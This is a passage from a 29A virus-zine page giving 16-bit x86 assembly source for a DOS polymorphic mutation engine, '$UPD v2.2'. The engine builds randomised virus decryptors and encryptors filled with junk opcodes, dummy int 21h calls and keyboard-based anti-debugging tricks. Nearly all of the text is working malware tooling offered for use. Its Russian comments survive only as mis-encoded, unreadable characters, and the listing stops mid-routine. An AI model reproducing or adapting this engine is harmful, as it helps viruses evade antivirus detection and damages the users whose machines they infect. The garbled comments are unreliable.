Copy Link
Add to Bookmark
Report
29A Issue 03 03 01
;-------------------- Welcome-to ------------------------;
; [$UPDû2.2], $pirit's Universal Polymorphic Device v2.2 ;
; (C)1996 by ÄNighÅÄ$piriÅÄ ;
;--------------------------------------------------------;
.MODEL TINY
LOCALS @@
JUMPS
.CODE
.186
public $UPD,FullRandom,Random,BRandom,Boolean
public $UPD_Bottom,$UPD_Top
;===[ᥠ£«®¡ «ìë¥ ¤ ë¥ (¡¥§ â ¡«¨æ)]=================================;
Where_Encryptor equ 1300 ; ¡®ç¨© ¤p¥á § è¨ä஢騪 ¢ ¡ãä¥à¥
$UPD_Bottom = $
$UPD_ID db '[$UPDû2.2], $pirit''s Universal Polymorphic Device '
db 'v2.2. (C)1995-1996 by ÄNighÅÄ$piriÅÄ'
_$UPD_ID = $
M_K equ Offset Key_Table-Offset Method_Table
Params db ? ; p ¬¥âpë, ¯¥p¥¤ ¢ ¥¬ë¥ $UPD ¢ ax
Key_Value dw ? ; ¬. ¤®ªã¬¥â æ¨î
Stack_Value dw ? ; ^^^^^^^^^^^^^^^^
Register_In_Cyc db ? ; ¥£¨áâà, ¨á¯®«ì§ã¥¬ë© ¢ 横«¥ ¤¥ª®¤¥à
; ¡¨â å: ª®¤¨àã¥âáï, ª ª ¯®«¥ reg
Register_In_Ofs db ? ; ¥£¨áâà, ¨á¯®«ì§ã¥¬ë© ¢ ¤à¥á 樨 ¤¥ª®¤¥à
; ¡¨â å: ª®¤¨àã¥âáï, ª ª ¯®«¥ reg
Register_In_Dis db ? ; ® ¦¥, ® ¢ ä®à¬ ⥠r/m
Register_In_Crypt db ? ; p¥£¨áâp ª®âp®«ì®© áã¬¬ë ¤«ï ª®¤¥p®¢
Where_CALL dw ? ; ¤à¥á ¨áâàãªæ¨¨ CALL <ofs_reg>
Where_Ini_Ofs dw ? ; ¤à¥á ª®¬ ¤ë ¨¨æ¨ «¨§ 樨 ॣ¨áâà ¤à¥á 樨
Where_Cycle dw ? ; ¤à¥á ç « § 横«¨¢ ¨ï
Where_INT3_CALL dw ? ; ¤p¥á ¨áâpãªæ¨¨ CALL ¢ ¯®¬¥å®§ é¨é. ª®¤¥
Where_INT3_Ini_Ofs dw ? ; ¤p¥á ª®¬ ¤ë ¨¨æ¨ «¨§ 樨 p¥£. ¤p. ¤«ï Int3
Where_INT3_Ini_Size dw ? ; ¤p¥á ª®¬ ¤ë ¨¨æ¨ «¨§ 樨 p¥£. áç¥â稪
Where_INT3_Proc dw ? ; ¤p¥á ¯p®æ¥¤ãpë á ¯®¬¥å®ãá⮩稢 ¬ ª®¤®¬
Where_Init_Proc dw ? ; ¤p¥á ¯p®æ¥¤ãpë á ç «ì®© ¨¨æ¨ «¨§ 樥©
Calls_Reg_Ini dd ? ; 2 ¤p¥á ¢ë§®¢®¢ ª®¤ ¨¨æ¨ «¨§ 樨 ¢á¥å p¥£.
Where_Reg_Ini dw ? ; ¤p¥á ¢®â í⮣® ^^^^^^^^^^^^^^^^^^^^^^^^^^^
Code_Length dw ? ; §¬¥à è¨äà㥬®£® ª®¤
DeCoder_Size dw ? ; §¬¥à ¤¥ª®¤¥à ¨ ¥ª®¤¥à
Method_Table db 10 dup ('M') ; ¡«¨æ ¯®¤ ⨯ë è¨ä஢ ¨ï
Key_Table db 10 dup ('K') ; ¡«¨æ ॣ¨áâ஢-ª«î祩
Call_Table dw 6 dup ('TC') ; ¡«¨æ ¯®¤ ¤à¥á ¯à®æ¥¤ãà è¨ä஢騪
Foreign_Call_Table dw 28 dup ('TF') ; ¡«¨æ ¯®¤ ¤à¥á call'®¢
Calls_Count db ? ; ¨á«® ᮧ¤ ¢ ¥¬ëå ¯à®æ¥¤ãà ¢ è¨ä஢騪¥
Foreign_Calls_Count db ? ; ¨á«® ¢ë§®¢®¢ ¨§ ¬¥¦¯à®æ. ¯à®áâà áâ¢
TLength dw ? ; «¨ â ¡«¨æë Method_Table
Encoder_Entry dw ? ; ¤à¥á ç « encryptor'a. ᯮ«ì§ã¥âáï ¯à¨
; ¢ë§®¢¥ ¯®áâ஥®£® encryptor'a
For_Cryptor db ? ; ®¤¥p¦¨â 1 ¨«¨ 0 - ª®£¤ ¢ë§ë¢ âì ¯®¬¥å®ãáâ.
; ª®¤ ¨§ ª®¤¥p
UnUsed db ? ; ᯮ«ì§ã¥âáï ¤«ï à §«¨çëå 楫¥©
db ?
When_30 db ? ; ç¥â稪 ç¨á« ¢ë§®¢®¢ ä-権 int 21h,
; ç¥p¥§ ª®â®p®¥ ¡ã¤¥â ¢ë§¢ ä-æ¨ï 30h ¨«¨ 35h
UU db ?
;===[á直¥ ¬¥«ª¨¥ ¯à®æ¥¤ãન]===========================================;
;-----------------------------------------------------------------------;
; à®æ¥¤ãà £¥¥à¨â á«ãç ©®¥ ç¨á«® ¬¥¦¤ã 0 ¨ 0ffffh ;
; ë室: ax=Randomize() ;
;-----------------------------------------------------------------------;
FullRandom proc near
xor ax,ax
dec ax
jmp Random
;-----------------------------------------------------------------------;
; à®æ¥¤ãà ¢®§¢à é ¥â ¢ al «¨¡® 0, «¨¡® 1 ;
;-----------------------------------------------------------------------;
Boolean:
mov ax,1
;-----------------------------------------------------------------------;
; à®æ¥¤ãà £¥¥à¨â á«ãç ©®¥ ç¨á«® ¬¥¦¤ã 0 ¨ ax ;
; ë室: ax=Randomize(), ZF=1 ¥á«¨ ax=0 ;
;-----------------------------------------------------------------------;
Random:
push bx cx dx ax
call $+3
pop bx
sub bx,Offset $-1
sub ax,ax
int 1ah ; cx:dx=áç¥â稪 横«®¢
in al,40h ; ©¬¥àë© ¯®àâ
xchg cx,ax
xchg dx,ax
lea bx,[bx+Ran_Num] ; ëç¨á«¥¨¥ RND
xor [bx],ax
rol word ptr [bx],cl
xor cx,word ptr [bx]
rol ax,cl
xor dx,word ptr [bx]
ror dx,cl
xor ax,dx
imul dx
xor ax,dx
xor word ptr [bx],ax
pop cx ; ¥àåïï £à ¨æ ¤¨ ¯ §®
sub dx,dx
inc cx
je Random_Ret
div cx
xchg ax,dx
Random_Ret:
pop dx cx bx
test ax,ax
retn
Ran_Num dw ?
;-----------------------------------------------------------------------;
; à®æ¥¤ãà £¥¥à¨â á«ãç ©®¥ ç¨á«® ¬¥¦¤ã 0 ¨ al ;
; ë室: al=Random() ;
;-----------------------------------------------------------------------;
BRandom:
xor ah,ah
jmp Random
FullRandom endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãà § ¯¨áë¢ ¥â ¡ ©â ¢ decryptor ¨ encryptor ;
; 室: es:di= ¤à¥á decryptor'a ;
; es:[di+Where_Encryptor]= ¤à¥á encryptor'a ;
; ë室: di++ ;
;-----------------------------------------------------------------------;
Random_Store_Byte proc near
call Store_Byte
push ax
call Random_Empty_Code
pop ax
retn
Store_Byte:
push di ; ¨å ¥¬ ¡ ©â ¢ encryptor
add di,Where_Encryptor
stosb
pop di
stosb ; ¨å ¥¬ ¡ ©â ¢ decryptor
retn
Random_Store_Byte endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãà § ¯¨áë¢ ¥â á«®¢® ¢ decryptor ¨ encryptor ;
; 室: â ª®© ¦¥, ª ª ¢ ¯à®æ¥¤ãàã Store_Byte ;
; ë室: di+=2 ;
;-----------------------------------------------------------------------;
Random_Store_Word proc near
call Store_Word
push ax
call Random_Empty_Code
pop ax
retn
Store_Word:
push di
add di,Where_Encryptor
stosw
pop di
stosw
retn
Random_Store_Word endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãà ¯à®¢¥àï¥â ⨯ ॣ¨áâà SP ¨ ॣ¨áâàë 横« / ¤à¥á 樨 ;
; 室: cl,ch=⨯ ॣ¨áâ஢ (cl=00000100b => SP) ;
; ë室: cl,ch=¥ SP-ॣ¨áâàë ;
;-----------------------------------------------------------------------;
Test_SP proc near
call Repeat_Test_SP
ror cl,3
call Repeat_Test_SP
rol cl,3
retn
Repeat_Test_SP:
push cx
and cl,00000111b
cmp cl,00000100b ; SP?
pop cx
jne Exit_Test_SP
push ax
mov al,111b
call BRandom
and cl,11111000b
or cl,al
pop ax
jmp Repeat_Test_SP
Exit_Test_SP:
retn
Test_SP endp
; ®¦¥â ᣥ¥p¨âì, ¬®¦¥â ¨ ¥â, 1 ¨áâpãªæ¨î ¨§ ¯¥p¢®© â ¡«¨æë
Random_Empty_Code:
call Boolean
jnz @@CONT
retn
@@CONT: dec ax
;-----------------------------------------------------------------------;
; à®æ¥¤ãà £¥¥à¨â á«ãç ©ë© "¯ãá⮩" ª®¤, ¥ ¢«¨ïî騩 ¤¥ª®¤¨à®¢ªã ;
; ¤«¨®© ¢ ®¤ã (âਠ¢ á«ãç ¥ ¢ë§®¢ ¯à¥àë¢ ¨ï) ¨áâàãªæ¨î ;
; 室: al=ç¨á«® ¨á¯®«ì§ã¥¬ëå â ¡«¨æ ( ç¨ ï á ¯¥à¢®©=0) ;
; es:di=ªã¤ § ¯¨å¨¢ âì ;
; ë室: di=㪠§ â¥«ì § ª®¥æ ᣥ¥à¨à®¢ ®£® ª®¤ ;
;-----------------------------------------------------------------------;
Empty_Code proc near
push ax cx si
cmp al,4 ; p®¢¥p塞, ¬®¦® «¨ £¥¥p¨âì ¢ë§®¢ë int 21h?
jne @@Skip18
test byte ptr [bx+Params],1
jnz @@Skip18
dec ax
@@Skip18:
mov byte ptr [bx+Work_Address+2],_Empty_Codes_1-Offset Empty_Codes_1-1
or al,al
jnz @@PASS
dec byte ptr [bx+Work_Address+2]
@@PASS:
push ax
call FullRandom
mov cx,ax ; cx=¥ª®¥ á«ãç ©®¥ ç¨á«®
pop ax ; ë¡¨à ¥¬ ®¬¥à â ¡«¨æë ¨§ ¯ï⨠áãé¥áâ¢ãîé¨å
call BRandom
mov si,ax ; si=al*5
shl si,2
add si,ax
mov ax,word ptr [bx+si+Work_Address] ; ¤à¥á ®¡à ¡®â稪
add ax,bx
push ax
mov al,byte ptr [bx+si+Work_Address+2] ; §¬¥à â ¡«¨æë ª®¬ ¤
call BRandom
mov si,word ptr [bx+si+Work_Address+3] ; ¤à¥á â ¡«¨æë ª®¬ ¤
add si,ax
cmp si,Offset Control_5 ; 2-å ¡ ©âë¥ â ¡«¨æë
jb Pass_Calculate
cmp si,Offset Control_7
jae Pass_Calculate
shr al,1
sub si,ax
Pass_Calculate:
add si,bx
lodsb ; ¨â ¥¬ í«¥¬¥â â ¡«¨æë
sub si,bx ; si=ᬥ饨¥ ¢ â ¡«¨æ¥ (¡¥§ ãç¥â bx)
retn
;---[ ¡«¨æ _1]----------------------------------------------------------;
Next_Tbl_1:
cmp si,Offset Control_1
jbe Exit_Tbl_1
and cl,00000111b ; ë¡¨à ¥¬ á«ãç ©ë© 16-¡¨âë©
call Test_SP
or al,cl ; ॣ¨áâà
Exit_Tbl_1:
call Store_Byte
jmp Empty_Done
;---[ ¡«¨æ _2]----------------------------------------------------------;
Next_Tbl_2:
cmp si,Offset Control_3
ja @@TBL3
and ch,00000001b ; ë¡¨à ¥¬ ¡¨â w
or al,ch
call Store_Byte ; ¥à¢ë© ¡ ©â ª®¬ ¤ë
mov al,11000000b
call Test_SP
or al,cl ; ë¡¨à ¥¬ ॣ¨áâàë/⨯ ᤢ¨£
jmp Exit_Tbl_2
@@TBL3:
cmp si,Offset Control_4
ja @@TBL4
push ax
mov al,11110110b
call Store_Byte ; ¥à¢ ï ç áâì ®¯ª®¤
pop ax
and cl,00000111b ; ë¡¨à ¥¬ ॣ¨áâà
call Test_SP
or al,cl
jmp Exit_Tbl_2
@@TBL4:
cmp si,Offset Control_5
ja @@TBL5
and ch,00000001b ; ë¡¨à ¥¬ w
or al,ch
call Store_Byte ; ¥à¢ë© ¡ ©â ª®¬ ¤ë
mov al,cl
or ch,ch ; ®¬ ¤ ®¯¥à¨àã¥â ¡ ©â ¬¨ (¤«¨ - 2¡)?
jz Exit_Tbl_2 ;
call Store_Byte ; ¥â, ®¯¥à¨àã¥â á«®¢ ¬¨ (¤«¨ 3¡)
call FullRandom
jmp Exit_Tbl_2
@@TBL5:
cmp si,Offset Control_6
ja @@TBL6
and cx,0000001100000111b ; ë¡¨à ¥¬ ¡¨âë s/w ¨ ॣ¨áâàë
jmp @@TBL7
@@TBL6:
cmp si,Offset Control_7
ja @@TBL8
and cx,0000000100000111b ; ë¡¨à ¥¬ ¡¨â w ¨ ॣ¨áâàë
@@TBL7:
call Test_SP
or al,ch
call Store_Byte ; ¥à¢ë© ¡ ©â ¨áâàãªæ¨¨
mov al,byte ptr [bx+si]
or al,cl
call Store_Byte
call FullRandom
dec ch
jnz Exit_Tbl_2 ; sw<>01 (w<>1) => ª®¬ ¤ ¤«¨®© 3¡
call Store_Byte
xchg ah,al ; ç¥ ¤«¨ 4¡
jmp Exit_Tbl_2
@@TBL8:
push ax
mov al,11111110b
and ch,00000001b ; ë¡¨à ¥¬ ¡¨â w
or al,cl
call Store_Byte
pop ax
and cl,00000111b ; ë¡¨à ¥¬ ॣ¨áâà
call Test_SP
or al,cl
;---[ ¡«¨æ _3]----------------------------------------------------------;
Exit_Tbl_2:
call Store_Byte ; ®á«¥¤¨© ¡ ©â ª®¬ ¤ë
jmp Empty_Done
;---[ ¡«¨æ _4]----------------------------------------------------------;
Next_Tbl_4:
call Store_Byte ; ¥à¢ë© ¡ ©â
and cl,00111111b
call Test_SP
push cx
and cl,00000111b
cmp cl,00000110b
pop cx
jnz CL_OK
or cl,1
CL_OK:
mov al,cl ; â®à®© ¡ ©â
call Store_Byte
jmp Empty_Done
;---[ ¡«¨æ _5]----------------------------------------------------------;
Next_Tbl_5:
cmp si,Offset Empty21th_2
ja @@TBL9
mov ah,10110100b ; ¥à¢ë© ¡ ©â ¨áâàãªæ¨¨ mov ah,xx
xchg ah,al ; (ah=xx, al=mov)
dec byte ptr [bx+When_30]
jz Make_30
cmp byte ptr [bx+When_30],2
jnz Not_Yet_30or35
mov ah,35h
jmp Not_Yet_30or35
Make_30:
mov ah,30h
mov word ptr [bx+When_30],4
Not_Yet_30or35:
call Store_Word
call CD21h
jmp Empty_Done
@@TBL9:
push ax
mov al,00000110b ; áâàãªæ¨ï push es
call Store_Byte
pop ax
mov ah,10110100b ; áâàãªæ¨ï mov ah,xx
xchg ah,al
call Store_Word
call CD21h ; áâàãªæ¨ï Int 21h
mov al,00000111b ; áâàãªæ¨ï pop es
call Store_Byte
Empty_Done:
pop si cx ax
retn
CD21h:
mov ax,9090h
push di
add di,Where_Encryptor
stosw
pop di
mov ax,21cdh
stosw
retn
;-----------------------------------------------------------------------;
; ¡«¨æ à ¡®ç¨å ¤à¥á®¢. ®à¬ â:
; dw ¬¥é¥¨¥_®¤¯à®£à ¬¬ë
; db §¬¥à_ ¡«¨æë
; dw ¬¥é¥¨¥_ ¡«¨æë
Work_Address dw Offset Next_Tbl_1
db _Empty_Codes_1-Offset Empty_Codes_1-1
dw Offset Empty_Codes_1
dw Offset Next_Tbl_2
db _Empty_Codes_2-Offset Empty_Codes_2-1
dw Offset Empty_Codes_2
dw Offset Exit_Tbl_2
db _Empty_Codes_3-Offset Empty_Codes_3-1
dw Offset Empty_Codes_3
dw Offset Next_Tbl_4
db _Empty_Codes_4-Offset Empty_Codes_4-1
dw Offset Empty_Codes_4
dw Offset Next_Tbl_5
db _Empty21th-Offset Empty21th_1-1
dw Offset Empty21th_1
;-----------------------------------------------------------------------;
; ¡«¨æ ®¤®¡ ©âëå ª®¬ ¤-¬ãá®à . ®à¬ â:
; --- ¤®¡ ©âë¥ ®¯ª®¤ë (Empty_Codes_1):
; Þ????????Þ
; clc/cmc/stc/sti/cld
; es:/cs:/ss:/ds:/std
; nop
; --- ®¬ ¤ë 16-¡¨âëå ॣ¨áâ஢ (Control_1):
; Þ?????regÞ
; xchg ?,ax
Empty_Codes_1 db 11111000b,11110101b,11111001b,11111011b,11111100b
db 00100110b,00101110b,00110110b,00111110b,11111101b
db 90h
Control_1 db 10010000b
_Empty_Codes_1 = $
;-----------------------------------------------------------------------;
; ¡«¨æ ª®¬ ¤ ¬ãá®à ¤«¨®© ¢ ¥áª®«ìª® ¡ ©â. ®à¬ â:
; --- ¥£¨áâà/¯ ¬ïâì á ॣ¨áâ஬ (Empty_Codes_2):
; add/adc/sub/sbb/cmp
; and/test/or/xor/mov
; Þ???????wÞ11 reg r/mÞ
; --- ¤¢¨£¨ 1 ¨ cl ¡¨â (Control_2):
; Þ???????wÞ11 TTT r/mÞ
; ᤢ¨£_ _1/ᤢ¨£_ _cl - ¯à¥¤¯®á«¥¤ïï âனª ¡¨â=TTT (⨯ ᤢ¨£ )
; --- ®¬ ¤ë not/neg/mul/imul (Control_3):
; Þ11110110Þ????? r/mÞ
; --- ªªã¬ã«ïâ®à (AX) á ¥¯®á।áâ¢¥ë¬ ®¯¥à ¤®¬ (Control_4):
; Þ???????wÞdataÞdata if w=1Þ
; add/adc/sub/sbb/cmp
; and/test/or/xor
; --- ¥¯®á।áâ¢¥ë© ®¯¥à ¤ á ॣ¨áâ஬ (í«¥¬¥â - 2 ¡ ©â ) (Control_5):
; Þ??????swÞ????? r/mÞdataÞdata if sw=01Þ
; add/adc
; sub/sbb
; cmp
; --- ¥¯®á।áâ¢¥ë© ®¯¥à ¤ á ॣ¨áâ஬ (í«¥¬¥â - 2 ¡ ©â ) (Control_6):
; Þ???????wÞ????? r/mÞdataÞdata if w=1Þ
; and/test
; or/xor
; --- ®¬ ¤ë ¨ªà¥¬¥â /¤¥ªà¥¬¥â ॣ¨áâà (Control_7):
; Þ1111111wÞ????? r/mÞ
; inc/dec
Empty_Codes_2 db 00000010b,00010010b,00101010b,00011010b,00111000b
db 00100010b,10000100b,00001010b,00110010b,10001000b
Control_2 db 11010000b,11010010b
Control_3 db 11010000b,11011000b,11100000b,11101000b
Control_4 db 00000100b,00010100b,00101100b,00011100b,00111100b
db 00100100b,10101000b,00001100b,00110100b
Control_5 db 10000000b,11000000b,10000000b,11010000b
db 10000000b,11101000b,10000000b,11011000b
db 10000000b,11111000b
Control_6 db 10000000b,11100000b,11110110b,11000000b
db 10000000b,11001000b,10000000b,11110000b
Control_7 db 11000000b,11001000b
_Empty_Codes_2 = $
;-----------------------------------------------------------------------;
; ¡«¨æ ®¤®¡ ©âëå ª®¬ ¤-¬ãá®à á® _á«ãç ©ë¬_ § 票¥¬ ¢
; ॣ¨áâà å/ä« £ å. ®à¬ â:
; Þ????????Þ
; cmpsb/scasb/lodsb
; lahf/xlat
Empty_Codes_3 db 10100110b,10101110b,10101100b
db 10011111b,11010111b
_Empty_Codes_3 = $
;-----------------------------------------------------------------------;
; ¡«¨æ ª®¬ ¤-¬ãá®à ¤«¨®© ¢ ¥áª®«ìª® ¡ ©â á® _á«ãç ©ë¬
; § 票¥¬ ¢ ॣ¨áâà å/ä« £ å. ®à¬ â:
; --- ¯¥à æ¨ï ¤ ॣ¨áâ஬ á ¨á¯®«ì§®¢ ¨¥¬ ï祥ª ¯ ¬ï⨠(Empty_Codes_4):
; Þ????????Þ00 reg r/mÞ (r/m<>110)
; mov/add/adc/sub/sbb
; cmp/and/test/or/xor
Empty_Codes_4 db 10001010b,00000010b,00010010b,00101010b,00011010b
db 00111010b,00100010b,10000100b,00001010b,00110010b
_Empty_Codes_4 = $
;-----------------------------------------------------------------------;
; ¡«¨æ "¯ãáâëå" äãªæ¨© Int 21h, ¨§¬¥ïîé¨å ॣ¨áâàë ax/bx/cx/dx
; (15 èâãª)
Empty21th_1 db 0bh ; Get input status at ax
db 19h ; Get current disk ID at ax
db 2ah ; Get system data at ax/cx/dx
db 2ch ; Get system time at cx/dx
db 30h ; Get DOS version at ax/bx/cx
db 4dh ; Get exit status at ax
db 51h ; Get PSP address at bx (undoc)
db 54h ; Get verify status at ax
db 62h ; Get PSP address at bx
Empty21th_2 db 2fh ; Get DTA address at es:bx
db 34h ; Get InDOS flag address at es:bx (undoc)
db 35h ; Get interrupt vector at es:bx
db 52h ; Get List Of Lists at es:bx (undoc)
_Empty21th = $
Empty_Code endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãà ª®¢¥àâ¨àã¥â ¡ ©â ¨§ ä®à¬ â reg ¢ ä®à¬ â r/m ;
; 室: al=reg ;
; ë室: al=r/m ;
;-----------------------------------------------------------------------;
Convert_Reg2RM proc near
cmp al,00000101b ; BP?
jb @@CVT2 ; BX
ja @@CVT1 ; DI ¨«¨ SI
inc ax
jmp @@CVT3
@@CVT1:
sub ax,2
jmp @@CVT3
@@CVT2:
mov al,00000111b
@@CVT3:
retn
Convert_Reg2RM endp
;===[ ª ᪠§ âì, á¥à¢¨áë¥ ¯à®æ¥¤ãન ¤«ï ®á®¢ëå ¯à®æ¥¤ãப ;)]=======;
Copy: ; ®¬¥é ¥â ª®¤ ¨§ [si] ¢ p áè¨äp.
lodsb
cmp al,0ffh
jz @@Skip16
cmp al,90h
jne @@Skip17
call Random_Empty_Code
jmp Copy
@@Skip17:
call Store_Byte
jmp Copy
@@Skip16:
retn
Rep_Clear_Buffer: ; ç¨á⪠ª« ¢¨ âãp®£® ¡ãä¥p
mov ah,1
int 16h
jz Buffer_Clear
mov ah,10h
int 16h
jmp Rep_Clear_Buffer
Buffer_Clear:
retn
Entry_For_Make_Init_Routine_Proc_Call: ; ë§ë¢ ¥âáï ¨§ ª®¤ , ᮧ¤. ç «ìãî
push si ax ax ; ¨¨æ¨ «¨§ 樮ãî ¯p®æ¥¤ãpã. ¬ëá« -
mov al,1 ; £¥¥p¨âì lea/mov, ® ¥ sub/xor
call BRandom
inc ax
inc ax
xchg si,ax
jmp Entry_Init_Proc
; ¨æ¨ «¨§ æ¨ï ॣ¨áâà ç/§ lea ¨«¨ mov (§ ®á¨âáï ¢ è¨ä஢騪¨)
; 室: ah=⨯ ॣ¨áâà (¢ ä®à¬ ⥠reg), dx=0 - ¨á¯®«ì§®¢ âì ⮫쪮 xor/sub,
; ( ç «ì ï ¨¨æ¨ «¨§ æ¨ï ä« £®¢)
Define_Move:
push si ax ax
mov al,3
or dx,dx
jnz @@Use_All_Methods
sub al,2
@@Use_All_Methods:
call BRandom ; 0=xor/1=sub/2=lea/3=mov
xchg si,ax
Entry_Init_Proc:
pop ax
cmp si,3
jz Used_MOV_1
cmp si,2
jz Used_LEA_1
mov al,ah
shl al,3
or al,11000000b
or ah,al ; ah=¢â®à®© ¡ ©â xor/sub
dec si
jz Used_SUB_1
mov al,31h ; ¥à¢ë© ¡ ©â xor <reg>,<reg>
jmp Used_XOR_1
Used_SUB_1:
mov al,29h ; ¥à¢ë© ¡ ©â sub <reg>,<reg>
jmp Used_XOR_1
Used_LEA_1:
mov al,10001101b ; ¥à¢ë© ¡ ©â ª®¬ ¤ë lea <reg>,[xxxx]
shl ah,3
or ah,110b
call Store_Word
call FullRandom ; ë¥ ª®¬ ¤ë lea (ç¨áâ® á«ãç ©ë¥)
jmp Used_XOR_1
Used_MOV_1:
mov al,10111000b ; ¥à¢ë© ¡ ©â ª®¬ ¤ë mov
or al,ah
call Store_Byte
call FullRandom
Used_XOR_1:
call Store_Word ; ë¥ ª®¬ ¤ë mov (⮦¥ ç¨áâ® á«ãç ©ë¥)
pop ax si
retn
; ¨æ¨ «¨§ æ¨ï ॣ¨áâà 横«
; 室: ah=⨯ ॣ¨áâà (¢ ä®à¬ ⥠reg)
; si=ªã¤ ¯®¬¥é âì ¤ ë¥ ®¡ ¤p¥á¥ ¨áâpãªæ¨¨ (¡¥§ ãç¥â bx)
; ZF=Boolean
Define_Ini_Cyc:
push ax
jz Used_MOV_2
mov al,10001101b ; ¥à¢®¥ á«®¢® ª®¬ ¤ë lea <reg>,[xxxx]
shl ah,3
or ah,110b
call Store_Word
mov ax,word ptr [bx+Code_Length]
shr ax,1 ; ¯¥à¨à㥬 á® á«®¢ ¬¨
inc ax
mov word ptr [bx+si],di
call Store_Word ; ë¥ ª®¬ ¤ë lea
jmp Used_LEA_2
Used_MOV_2:
mov al,10111000b ; ¥à¢ë© ¡ ©â ª®¬ ¤ë mov
or al,ah
call Store_Byte
mov ax,word ptr [bx+Code_Length]
shr ax,1 ; ¯¥à¨à㥬 á® á«®¢ ¬¨
inc ax
mov word ptr [bx+si],di
call Store_Word ; ë¥ ª®¬ ¤ë mov
Used_LEA_2:
pop ax
retn
; ¨æ¨ «¨§ æ¨ï ॣ¨áâà ¤à¥á 樨
; 室: ah=⨯ ॣ¨áâà (¢ ä®à¬ ⥠reg)
; si=ªã¤ ¯®¬¥é âì ¤ ë¥ ®¡ ¤p¥á¥ ¨áâpãªæ¨¨ ¨¨æ¨ «¨§ 樨 (¡¥§ bx)
Define_Ini_Ofs_1:
push ax cx dx ax
mov dx,1
jmp JMP_HERE
Define_Ini_Ofs:
push ax cx dx ax
xor dx,dx
JMP_HERE:
mov al,9 ; áâ ¢«ï¥¬ ®â 1 ¤® 10 ¡ ¬¥¦¤ã call ¨ pop <reg>
call BRandom
inc ax
push ax
mov ah,0e8h ; áâàãªæ¨ï call (¢ãâà¨á¥£¬¥â ï, 3 ¡ ©â )
xchg ah,al
call Store_Word
xor ax,ax
call Store_Byte
pop ax
cmp si,Offset Where_Ini_Ofs
jne @@Another_Where1
mov word ptr [bx+Where_CALL],di
jmp @@Another_Where2
@@Another_Where1:
mov word ptr [bx+Where_INT3_CALL],di
@@Another_Where2:
mov cx,ax ; ¡¨¢ ¥¬ ¯à®áâà á⢮ ¬¥¦¤ã call ¨ pop <reg>
@@INIT3: ; ¢á类© £ ¤®áâìî
mov al,0ffh
call BRandom
call Store_Byte
loop @@INIT3
mov al,9
call BRandom
inc ax
xchg ah,al ; 1-10 ¨áâpãªæ¨© ¨§ 2-å â ¡«¨æ
inc ax
call Make_Empty_Code
or dx,dx
jz @@SKIP11
mov al,0e8h ;
᫨ íâ ¯p®æ¥¤ãp ¢ë§ë¢ « áì á 楫ìî ¨¨-
call Store_Byte ; æ¨ «¨§ 樨 p¥£¨áâp ¤p¥á 樨 ¢ ª®¤¥ p á-
mov ax,word ptr [bx+Where_INT3_Proc] ; è¨äp®¢ë¢ îé¨å ¨-
sub ax,di ; áâpãªæ¨© (Define_Ini_Ofs_1:), â® ¤®¡ ¢«ï¥¬
dec ax ; ¯¥p¥¤ pop'®¬ ¢ë§®¢ ¯p®æ¥¤ãpë á ¯®¤áç¥â®¬
dec ax ; CRC ¤¥ª®¤¥p (¯®¬¥å®ãáâ®©ç¨¢ë© ª®¤)
call Store_Word
@@SKIP11:
pop ax ; ah=<reg>
mov al,01011000b ; áâàãªæ¨ï pop <reg>
or al,ah
call Store_Byte
or ah,11000000b ; ᯮ«ì§®¢ âì add á ¥¯®á।áâ¢¥ë¬ ®¯¥à ¤®¬
mov al,10000001b ; 4-å ¡ ©âë© add ¤«ï «î¡®£® 16-¡¨â®£® ॣ¨áâà
call Store_Word
mov word ptr [bx+si],di
call Store_Word
pop dx cx ax
retn
; p®æ¥¤ãp £¥¥p¨â ª®¤, ¢ë§ë¢ î騩 int 16h ¤«ï ¯p®ç⥨ï á«®¢ ¢ ax:
; mov ax,10xx ...
; int 16h
; mov <Regisetr_In_Crypt>,ax ; Ǭ xchg <Rregister_In_Crypt>,ax
; 室: ds:di - ¡ãä¥p
Generate_Read16h:
push dx
mov al,10b ; Tmp_Reg=bx, cx ¨«¨ dx
call BRandom
inc al
mov byte ptr [bx+Tmp_Reg],0
cmp al,byte ptr [bx+Register_In_Crypt]
jne @@SKIP7
mov byte ptr [bx+Tmp_Reg],1
@@SKIP7:
or al,01011000b ; pop <Tmp_Reg>
push ax ax ax
and al,11110111b ; push <Tmp_Reg>
push ax
call Boolean
jz @@SKIP6
call Random_Empty_Code
pop ax
cmp byte ptr [bx+Tmp_Reg],1
je @@SKIP8
call Random_Store_Byte ; ¥¥p¨¬ push <Tmp_Reg>
@@SKIP8:
call Call_Kbd_Read
jmp @@SKIP5
@@SKIP6:
call Call_Kbd_Read ; ¢ p § ç¨â ¥¬ áp ãî ª« ¢¨ âãpã
pop ax
cmp byte ptr [bx+Tmp_Reg],1
je @@SKIP5
call Random_Store_Byte
@@SKIP5:
mov al,50h ; (push ax)
call Store_Byte
call Call_Kbd_Read ; <- ®â íâ® ¢â®p®© p §
pop ax ; (pop <Tmp_Reg> (cx/bx/dx))
call Random_Store_Byte
call Boolean ; ®§¤ ¥¬ ¨áâpãªæ¨î mov ah,<Tmp_Reg_Low>
pop ax ; ¤¢ã¬ï ¬¥â®¤ ¬¨:
jz @@SKIP2
and al,111b
or ax,1000101011100000b ; <reg=ah> <- <r/m>
jmp @@SKIP4
@@SKIP2:
and al,111b
shl al,3
or ax,1000100011000100b ; <r/m=ah> <- <reg>
@@SKIP4:
xchg ah,al
call Random_Store_Word
call Boolean
xchg dx,ax
mov ah,11000000b
or ah,byte ptr [bx+Register_In_Crypt]
mov al,89h ; mov/xchg <Register_In_Crypt>,ax
sub ax,dx
sub ax,dx
call Random_Store_Word
call Boolean ; ¨å ¥¬ ᤢ¨£ rol/ror <Register_In_Crypt>,1
shl al,3 ; rol ¨«¨ ror
or al,11000000b
or al,byte ptr [bx+Register_In_Crypt]
mov ah,11010001b
xchg ah,al
call Random_Store_Word
pop ax ; pop <Tmp_Reg>
cmp byte ptr [bx+Tmp_Reg],1
je @@SKIP9
call Random_Store_Byte
@@SKIP9:
pop dx
retn
Tmp_Reg db ? ; 1 => <Tmp_Reg>=<Register_In_Crypt>
Call_Kbd_Read: ; ¥¥p æ¨ï ¢ë§®¢ int 16h ¤«ï ç⥨ï (ah=0)
call Random_Empty_Code
call Boolean
jnz @@SKIP1
xor dx,dx ; ¨¡® xor ax,ax, «¨¡® sub ax,ax
call Define_Move ; (ax=0)
jmp @@SKIP3
@@SKIP1:
